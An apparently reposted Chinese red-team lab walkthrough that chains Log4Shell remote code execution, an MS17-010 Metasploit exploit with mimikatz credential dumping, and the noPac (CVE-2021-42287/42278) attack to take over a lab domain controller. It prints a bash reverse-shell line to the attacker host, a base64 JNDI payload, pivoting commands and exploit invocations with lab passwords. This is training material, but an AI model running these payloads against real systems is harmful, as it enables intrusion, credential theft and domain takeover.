从外网 log4j2 RCE 再到内网组合拳漏洞 CVE-2021-42287、CVE-2021-42278 拿到 DC

爱被打了一巴掌 2024-03-26 13:53 6阅读 0赞

### 网络拓扑 ###

[![fc6c670f267e9bc3db757c802b738b4f.png][]][fc6c670f267e9bc3db757c802b738b4f.png 1]

### 信息搜集 ###

渗透测试第一步当然是信息搜集

拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151

发现开放了22,38080这两个端口

[![fdf9a898f495c30c4539ca58a1b57edc.png][]][fdf9a898f495c30c4539ca58a1b57edc.png 1]

通过nmap我们可以得知这是一台Ubuntu，22是ssh，而38080这个端口是unknown的，我们尝试访问一下

[![228463a2ea2bad2c704f63175eeb3306.png][]][228463a2ea2bad2c704f63175eeb3306.png 1]

于是尝试最近爆出的新漏洞 CVE-2021-44228 尝试看看能不能获取到 dnslog

[![efb32f4a322b5d34bac7ac32d705cc80.png][]][efb32f4a322b5d34bac7ac32d705cc80.png 1]

发现存在 CVE-2021-44228漏洞，尝试去获取一个shell

### CVE-2021-44228 利用 ###

首先在我们的VPS kali(192.168.81.133) 开启一个LDAP：

> git clone [https://github.com/black9/Log4shell\_JNDIExploit.git][https_github.com_black9_Log4shell_JNDIExploit.git]
> 
>     java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133

[![eab1a99b24d34d67d53e1cd7b2c7b16e.png][]][eab1a99b24d34d67d53e1cd7b2c7b16e.png 1]

然后在kali上nc监听9999端口：

[![0e94c23eaa650ee51b2cd7d1e0f0be93.png][]][0e94c23eaa650ee51b2cd7d1e0f0be93.png 1]

我们使用TOMCATBYpass进行反弹shell

[![5bdd44e76a1f1ceac1bead1281344ba7.png][]][5bdd44e76a1f1ceac1bead1281344ba7.png 1]

/bin/bash -i >& /dev/tcp/192.168.210.23/9999 0>&1 -反弹shell

反弹shell命令需要进行base64编码

![c52e6b305749bfda74d065343ff13448.jpeg][]

BP抓包，改为post传参并且构造payload

> payload=$\{jndi:ldap://192.168.81.133:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzMy85OTk5IDA+JjE=\}

最后使用EXP成功反弹shell，要对base64编码进行两次url编码才能执行

[![b9736ea1711c022a1b0d2ee6ed5f8522.png][]][b9736ea1711c022a1b0d2ee6ed5f8522.png 1]

[![0fe389a0165bd0c8509c1f4bbe519b37.png][]][0fe389a0165bd0c8509c1f4bbe519b37.png 1]

发现当前拿到的shell是一个docker容器

想办法逃逸也失败了，最后在/root/目录下找到了flag文件：

[![976ae1c5d422cda65b3931f13ae8dc66.png][]][976ae1c5d422cda65b3931f13ae8dc66.png 1]

flag{redteam.lab-1}
    
    Congratulations, you got this: saul Saul123

得到了一个flag，还有一个类似于账号密码的东西

在信息收集中nmap扫到目标主机开放22ssh服务，因此思考可能是ssh的账号密码

### 内网信息搜集 ###

通过上节得到的账号和密码登陆到了Ubuntu系统

[![00160f88af0e51806be560b78007973f.png][]][00160f88af0e51806be560b78007973f.png 1]

我们可以看到当前机器拥有两块网卡，一块ens33用于链接外网，一块ens38用于内网通信

[![a1e5ef83545771e8d87a3f28ffaf46c4.png][]][a1e5ef83545771e8d87a3f28ffaf46c4.png 1]

> 在实战的内网渗透中：如果是在 linux 环境下的内网渗透尽量形成全部 bash 和 python 化，因为 Linux 都完全自带，而在 windows 下的内网渗透则尽量全部形成 powershell，bat、vbs 化，尽量不要过于依赖外部工具。

所以我们使用for循环ping一下ens38的c段网络

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

[![4a1e12411da36810a1427d801ba28fb1.png][]][4a1e12411da36810a1427d801ba28fb1.png 1]

发现内网还有一台机器10.0.1.7存在

或者使用 scan info 工具进行内网信息收集

kali中使用python快速搭建httpd

![在这里插入图片描述][b651172c3f116863517b4109e9750f1c.png]

靶机下载工具并赋予权限

![在这里插入图片描述][0290266ce35c0d86b4068b395100db82.png]

进行内网信息收集

![在这里插入图片描述][451383c08b681874e6568d23de0b347d.png]

发现10.0.1.7存活并存在MS17-010

随后为了方便，我选择用 frp 把当前机器的流量代理出来：

配置frps.ini

[![1253d773a4d08bd2b50b42819afbd7fb.png][]][1253d773a4d08bd2b50b42819afbd7fb.png 1]

配置frpc.ini

[![8dd86d2f0d9ad708de4aeb0e866d7f8c.png][]][8dd86d2f0d9ad708de4aeb0e866d7f8c.png 1]

然后使用 Metasploit 设置 Socks5 对内网进行深度信息搜集；

setg Proxies socks5:192.168.81.133:8888
    setg ReverseAllowProxy true

[![ba179b8b45b82929cb088c96fcf1501f.png][]][ba179b8b45b82929cb088c96fcf1501f.png 1]

使用 smb 版本探测模块对目标进行扫描：

use auxiliary/scanner/smb/smb_version

[![57ed92fbc228275c717d1aadff59cf5a.png][]][57ed92fbc228275c717d1aadff59cf5a.png 1]

发现目标10.0.1.7版本是windows7，并且存在域REDTEAM

既然是windows7，那么就可能存在MS17-010漏洞

### MS17-010利用 ###

通过上节，我们知道了10.0.1.7是win7，接下来进行探测

[![6e2f1a0e338c17ca99ff19797caf53c3.png][]][6e2f1a0e338c17ca99ff19797caf53c3.png 1]

通过探测得知这台机器是存在ms17-010漏洞的

由于目标是内网不一定出网，故而tcp反射连接不能使用 设置为payload正向bind\_tcp

[![0cabbe67c20662ac862a772359905c7f.png][]][0cabbe67c20662ac862a772359905c7f.png 1]

[![2024ea825071b963c89a7b34e8041953.png][]][2024ea825071b963c89a7b34e8041953.png 1]

直接拿到win7权限，然后加载mimikataz把密码抓出来

Username   Domain   Password
     root     REDTEAM   Red12345

meterpreter > load mimikatz  加载工具
    
    meterpreter > creds_all      列出凭证  
    注意命令是从内存中抓取密码，靶场原始状态为暂停恢复即可，如果重启过需要登录一次win7

![0206cf4153984680e3a4e86c9cfce36f.png][]

这个时候就得到了一个域用户的账号了。

### 内网利器 CVE-2021-42287、CVE-2021-42278 ###

通过对当前内网的信息搜集之后发现，win7还有一块内网的网卡

[![0de7acb310b465c8d4c4397bc41788e2.png][]][0de7acb310b465c8d4c4397bc41788e2.png 1]

[![75af465b6c2364360043d3375fd8382c.png][]][75af465b6c2364360043d3375fd8382c.png 1]

且定位到域控到域控 IP 为 10.0.0.12

[![e0a5ae46092752f0cb71885ef3002257.png][]][e0a5ae46092752f0cb71885ef3002257.png 1]

由于最近爆出了两个域内漏洞：CVE-2021-42287、CVE-2021-42278，直接尝试利用一下。

> 具体原理是：假如域内有一台域控名为 DC(域控对应的机器用户为 DC)，此时攻击者利用漏洞CVE-2021-42287创建一个机器用户saulGoodman，再把机器用户 saulGoodman的sAMAccountName改成DC。然后利用DC去申请一个TGT票据。再把DC的sAMAccountName改为sAMAccountName。这个时候 KDC 就会判断域内没有 DC 和这个用户，自动去搜索 DC(DC是域内已经的域控DC 的 sAMAccountName)，攻击者利用刚刚申请的 TGT进行 S4U2self，模拟域内的域管去请求域控 DC 的 ST 票据，最终获得域控制器DC的权限。

于是直接使用MSF添加一个socks5

[![6c642cfdc362aaf99ab3e643fd30d26e.png][]][6c642cfdc362aaf99ab3e643fd30d26e.png 1]

添加路由

run autoroute -s 10.0.0.7/24

[![da553d06c213bf67b05eeb5b2f4434a5.png][]][da553d06c213bf67b05eeb5b2f4434a5.png 1]

然后我们把本地的代理加上就行了

[![23776374b7ec5220e214e8930594b1a4.png][]][23776374b7ec5220e214e8930594b1a4.png 1]

利用工具下载地址

> https://github.com/WazeHell/sam-the-admin
> 
> https://github.com/Ridter/noPac
> 
> https://github.com/waterrr/noPac

然后利用脚本即可

proxychains python3 sam_the_admin.py "redteam.lab/root:Red12345" -dc-ip 10.0.0.12 -shell
    proxychains python noPac.py redteam.lab/root:'Red12345' -dc-ip 10.0.0.12 -shell --impersonate administrator -use-ldap
    proxychains python3 exp.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell

[![9fe577361c7211fa7a3c95b9d914ea5f.png][]][9fe577361c7211fa7a3c95b9d914ea5f.png 1]

最后也是拿到了最终的 Flag。

[![ced018cce02044d6dd6e80a2bb660e0c.png][]][ced018cce02044d6dd6e80a2bb660e0c.png 1]

靶机环境： 链接: [https://pan.baidu.com/s/18pXdC2f\_zDsXONpSUg1fYg 提取码: 8dcy ][https_pan.baidu.com_s_18pXdC2f_zDsXONpSUg1fYg _ 8dcy]

原文链接： [http://www.kryst4l.cn/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-log4j2-RCE-%E5%86%8D%E5%88%B0%E5%86%85%E7%BD%91%E6%A0%B8%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%B4%9E-CVE-2021-42287%E3%80%81CVE-2021-42278-%E6%8B%BF%E5%88%B0-DC/][http_www.kryst4l.cn_2021_12_22_E4_BB_8E_E5_A4_96_E7_BD_91-log4j2-RCE-_E5_86_8D_E5_88_B0_E5_86_85_E7_BD_91_E6_A0_B8_E5_BC_B9_E7_BB_84_E5_90_88_E6_8B_B3_E6_BC_8F_E6_B4_9E-CVE-2021-42287_E3_80_81CVE-2021-42278-_E6_8B_BF_E5_88_B0-DC]

[fc6c670f267e9bc3db757c802b738b4f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/530e01e9cfe4492794024787d52129fc.png
[fc6c670f267e9bc3db757c802b738b4f.png 1]: https://s2.loli.net/2022/03/26/pJkCEBD64MUlW2n.png
[fdf9a898f495c30c4539ca58a1b57edc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/affcb03880bb47f89c50c090ecf659c5.png
[fdf9a898f495c30c4539ca58a1b57edc.png 1]: https://s2.loli.net/2022/03/26/cI4GZWYdyCXVw25.png
[228463a2ea2bad2c704f63175eeb3306.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/e0b457c6f4394d3bb1b6dbf2c7526f13.png
[228463a2ea2bad2c704f63175eeb3306.png 1]: https://s2.loli.net/2022/03/26/B9iafA5UQG6Mthu.png
[efb32f4a322b5d34bac7ac32d705cc80.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/ee4f234529b0484d8f46b0456755b151.png
[efb32f4a322b5d34bac7ac32d705cc80.png 1]: https://s2.loli.net/2022/03/26/kYWci9K2xJSf7bE.png
[https_github.com_black9_Log4shell_JNDIExploit.git]: https://github.com/black9/Log4shell_JNDIExploit.git
[eab1a99b24d34d67d53e1cd7b2c7b16e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/6c8c843826ac4460bc4d03afd8faee5b.png
[eab1a99b24d34d67d53e1cd7b2c7b16e.png 1]: https://s2.loli.net/2022/03/26/NDBES56xkePFCs7.png
[0e94c23eaa650ee51b2cd7d1e0f0be93.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/8c4e2e559a6c47d29d1245be32ff028a.png
[0e94c23eaa650ee51b2cd7d1e0f0be93.png 1]: https://s2.loli.net/2022/03/26/i6KoDWz52ftr8SM.png
[5bdd44e76a1f1ceac1bead1281344ba7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/183de085da0b4464b1dd5eb5597e9e0c.png
[5bdd44e76a1f1ceac1bead1281344ba7.png 1]: https://s2.loli.net/2022/03/26/dMnfyU5EwiPIrzO.png
[c52e6b305749bfda74d065343ff13448.jpeg]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f1e0ac1bc260423fa281aa270568d1c9.png
[b9736ea1711c022a1b0d2ee6ed5f8522.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/9b05856b73f9431b8d73850905f5d1f2.png
[b9736ea1711c022a1b0d2ee6ed5f8522.png 1]: https://s2.loli.net/2022/03/26/kZv46HpbXFYsDVK.png
[0fe389a0165bd0c8509c1f4bbe519b37.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/d8566a6cbb5b4c78b47914ef090b3489.png
[0fe389a0165bd0c8509c1f4bbe519b37.png 1]: https://s2.loli.net/2022/03/26/qFjSYmpkBZt4fPR.png
[976ae1c5d422cda65b3931f13ae8dc66.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/6aefe17464024287a53a64a31190ed16.png
[976ae1c5d422cda65b3931f13ae8dc66.png 1]: https://s2.loli.net/2022/03/26/VNcPrW9L2F18ED3.png
[00160f88af0e51806be560b78007973f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f49e2b35b81b4af8a27658a6bc157050.png
[00160f88af0e51806be560b78007973f.png 1]: https://s2.loli.net/2022/03/26/fLa4TD7G2ypnuFq.png
[a1e5ef83545771e8d87a3f28ffaf46c4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f98aec7640ac454c99aac8ee25ec1ad0.png
[a1e5ef83545771e8d87a3f28ffaf46c4.png 1]: https://s2.loli.net/2022/03/26/iDIokwam13ZJEGq.png
[4a1e12411da36810a1427d801ba28fb1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/b6b0e8cf0ab54154b63499a9020ce4e9.png
[4a1e12411da36810a1427d801ba28fb1.png 1]: https://s2.loli.net/2022/03/26/njqNltUAGLKBPJW.png
[b651172c3f116863517b4109e9750f1c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/db3258ed5dd64f8f80998327dce37340.png
[0290266ce35c0d86b4068b395100db82.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/edfa103ee0184072b2f5566b5057e546.png
[451383c08b681874e6568d23de0b347d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/07aadfc236d848a09982daacc4f4cef5.png
[1253d773a4d08bd2b50b42819afbd7fb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/326a760837ec461bac41a4dca65035bd.png
[1253d773a4d08bd2b50b42819afbd7fb.png 1]: https://s2.loli.net/2022/03/26/YVc2u6Dk8xZJfe4.png
[8dd86d2f0d9ad708de4aeb0e866d7f8c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/4234e16e484949b6be6d3d93d3938266.png
[8dd86d2f0d9ad708de4aeb0e866d7f8c.png 1]: https://s2.loli.net/2022/03/26/ByHCv2DpAsgaTiF.png
[ba179b8b45b82929cb088c96fcf1501f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/5ce1232ccc644402928143957eca4844.png
[ba179b8b45b82929cb088c96fcf1501f.png 1]: https://s2.loli.net/2022/03/26/JybfN24HIuZxDKp.png
[57ed92fbc228275c717d1aadff59cf5a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/451e7b95f6ae4ec3a233fc2b213f80d2.png
[57ed92fbc228275c717d1aadff59cf5a.png 1]: https://s2.loli.net/2022/03/26/ruRjVQqIhZ9sfGb.png
[6e2f1a0e338c17ca99ff19797caf53c3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/523e3e314717484584049e9298a8f60d.png
[6e2f1a0e338c17ca99ff19797caf53c3.png 1]: https://s2.loli.net/2022/03/26/RAbrUzl1kgOdpYN.png
[0cabbe67c20662ac862a772359905c7f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/c48685b9443244ee92ccdb8fdfc1d312.png
[0cabbe67c20662ac862a772359905c7f.png 1]: https://s2.loli.net/2022/03/26/OzsaNtR6dG9Fyg4.png
[2024ea825071b963c89a7b34e8041953.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/fd50da3b7cc4427281dea67d77adec83.png
[2024ea825071b963c89a7b34e8041953.png 1]: https://s2.loli.net/2022/03/26/Eij13P7y8DBWHzK.png
[0206cf4153984680e3a4e86c9cfce36f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/9cf212a1c3444c84b37bff51b9b9db7f.png
[0de7acb310b465c8d4c4397bc41788e2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/0cc2cc7c15ae4aef9eb231508f3ff6d5.png
[0de7acb310b465c8d4c4397bc41788e2.png 1]: https://s2.loli.net/2022/03/26/tEFeGYWNkB1PyoQ.png
[75af465b6c2364360043d3375fd8382c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/1923dfc0356344e48bfd5cba8042bc32.png
[75af465b6c2364360043d3375fd8382c.png 1]: https://s2.loli.net/2022/03/26/PGONcnpm3qx7QMa.png
[e0a5ae46092752f0cb71885ef3002257.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/6e8f6f2a1a7e41f6abc7d84c7dbcbc8d.png
[e0a5ae46092752f0cb71885ef3002257.png 1]: https://s2.loli.net/2022/03/26/dnaVStPHDWuLyGF.png
[6c642cfdc362aaf99ab3e643fd30d26e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/dd19b9fad9a64074925c4737c2fbff36.png
[6c642cfdc362aaf99ab3e643fd30d26e.png 1]: https://s2.loli.net/2022/03/26/MTmI89i5qbeBNw4.png
[da553d06c213bf67b05eeb5b2f4434a5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/57c168bfddb64d74b439d0bd0e31ab5e.png
[da553d06c213bf67b05eeb5b2f4434a5.png 1]: https://s2.loli.net/2022/03/26/QokYtf28J7EaNPH.png
[23776374b7ec5220e214e8930594b1a4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/cf2e7ab515b24cb8a5293b609fbe3de7.png
[23776374b7ec5220e214e8930594b1a4.png 1]: https://s2.loli.net/2022/03/26/j3F6kdsn4RT1LoB.png
[9fe577361c7211fa7a3c95b9d914ea5f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/c2fee0e0243849df9ea3f2f907c7acf5.png
[9fe577361c7211fa7a3c95b9d914ea5f.png 1]: https://s2.loli.net/2022/03/26/wAJmkWHTo5tlLSe.png
[ced018cce02044d6dd6e80a2bb660e0c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f6e00b966ab34e148c40c8ad8fda54d0.png
[ced018cce02044d6dd6e80a2bb660e0c.png 1]: https://s2.loli.net/2022/03/26/FC9TBKH4fyl7ti5.png
[https_pan.baidu.com_s_18pXdC2f_zDsXONpSUg1fYg _ 8dcy]: https://pan.baidu.com/s/18pXdC2f_zDsXONpSUg1fYg%20%E6%8F%90%E5%8F%96%E7%A0%81:%208dcy%C2%A0
[http_www.kryst4l.cn_2021_12_22_E4_BB_8E_E5_A4_96_E7_BD_91-log4j2-RCE-_E5_86_8D_E5_88_B0_E5_86_85_E7_BD_91_E6_A0_B8_E5_BC_B9_E7_BB_84_E5_90_88_E6_8B_B3_E6_BC_8F_E6_B4_9E-CVE-2021-42287_E3_80_81CVE-2021-42278-_E6_8B_BF_E5_88_B0-DC]: http://www.kryst4l.cn/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-log4j2-RCE-%E5%86%8D%E5%88%B0%E5%86%85%E7%BD%91%E6%A0%B8%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%B4%9E-CVE-2021-42287%E3%80%81CVE-2021-42278-%E6%8B%BF%E5%88%B0-DC/